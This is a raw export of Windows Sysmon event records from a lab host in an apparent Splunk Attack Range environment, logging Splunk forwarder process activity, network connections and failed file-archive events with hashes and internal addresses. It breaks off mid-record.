AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62214-false10.0.1.12-8000- 23542300x800000000000000035128888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:19.174{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B12AECA73ABADBD08624706FA4C6630E,SHA256=C743216A9E78F104C6CE6D9E7B47A1EDB472F47CAF69ECA83853130EFCAD4145,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:20.749{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=100C8B70163152150354CACF7D7389FC,SHA256=0586C5E10923E9F9FE63C0280039E9F201B95E332722EA5CD0DEB3C03BA5791C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:44.282{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\System32\wbem\WmiPrvSE.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local62216-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035128891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:44.208{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62215-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:21.759{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D19463D6744D048D03BC9804A548E52,SHA256=9DA806F8A43E88F13A3BF6024E4D6399F32FF6B99C62F110CA13404A57A76249,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:22.774{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEE7D468CCB84BB7B2F393DA632851D7,SHA256=BB3B719F6DE548369C22D0CD3313976F65A02A9F468122C8AC4569859C3CC4BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:23.804{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62EF9CC89738AEF064D1C34DD190BD47,SHA256=033A982C716DD3135C42101AEAB98445316074031803B70A311BCA0E80D8B2D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:24.928{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4574B83D060408126DFCB8E40C1F442C,SHA256=CB60B6D4D96E3B2165DA4762297926350D108F80ADBD73388293A78CCC308001,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:48.331{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62217-false10.0.1.12-8000- 10341000x800000000000000035128907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:26.867{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-83FA-613A-EA96-03000000C801}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:26.867{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:26.867{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:26.867{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:26.867{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:26.867{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-83FA-613A-EA96-03000000C801}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:26.867{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-83FA-613A-EA96-03000000C801}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:26.852{B81B27B7-83FA-613A-EA96-03000000C801}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:26.023{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A3518164D18932DD88D9895042FE1D8,SHA256=C20524F89DE3924D9ACEAC600E0EFF6F56BCC17C004F12D9EF2D449AEE3D4023,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128920Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:27.874{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=55A844F21A3FEADEAF917C1703584218,SHA256=B5A33D45B5EF70285E49CBB2FC94E77EAF2999CB72DAC8575A4C7AE730F20064,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128919Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:27.854{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC52F428936E67F824B71B1D6975CB77,SHA256=7B8DFC2590C958C5C24C80BA8C6DEC4368BBBBD33D78FAE75CAABE97EA865D2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:27.854{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D57E8D60942E7A194CC85E9A4A1235DD,SHA256=69428FECC1A09E10FDB37538689B3C729325B6AE17C900E71D0E42C9695D517B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:27.554{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-83FB-613A-EB96-03000000C801}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:27.554{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:27.554{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:27.554{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:27.554{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:27.554{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-83FB-613A-EB96-03000000C801}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:27.554{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-83FB-613A-EB96-03000000C801}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:27.541{B81B27B7-83FB-613A-EB96-03000000C801}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:27.034{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89F7C3E91A08E33DBEB7E97B1AC110CA,SHA256=E7C7CD273D2CA5CC01140B1F27054FCE0BA30C076FD3A9788990F1770F38C625,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:27.014{B81B27B7-83FA-613A-EA96-03000000C801}4892440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035128921Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:28.053{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67E0BAA25249C7CA3E2669DC17C55ED9,SHA256=8B0D39E7AC21C41FF2CB411EC899EE822EDA2BE5094FB90F4F0FC98F88FCF2B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128925Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:29.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BFBBBA46A7F9FA097B38614FB2F95A6E,SHA256=B9D5F8C9274AD9D5C59458A246493337D5FF8A08986DF836D310D36FBD380806,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128924Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:54.290{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62219-false10.0.1.12-8000- 354300x800000000000000035128923Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:53.645{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62218-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128922Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:29.070{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=560A0942CB63D765DCF1F72A2439E527,SHA256=920CFA973C311418EB8687BA72157AD6B176AE7CA49F9DB0D3F1E731F8259D5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128926Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:30.104{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E6279219204BDD31F97D3A9713E5BDF,SHA256=656365EB49D4CE6314E42EB9F6A62BD8D170417736FB37F707F50DEC541874D9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128927Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:31.134{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51F0BC018D76358EC7776E5467B23653,SHA256=83600360A203EF20DFA00E35A73692BB584BED51B1E9DE3C4941BEB9E597E075,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:32.149{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 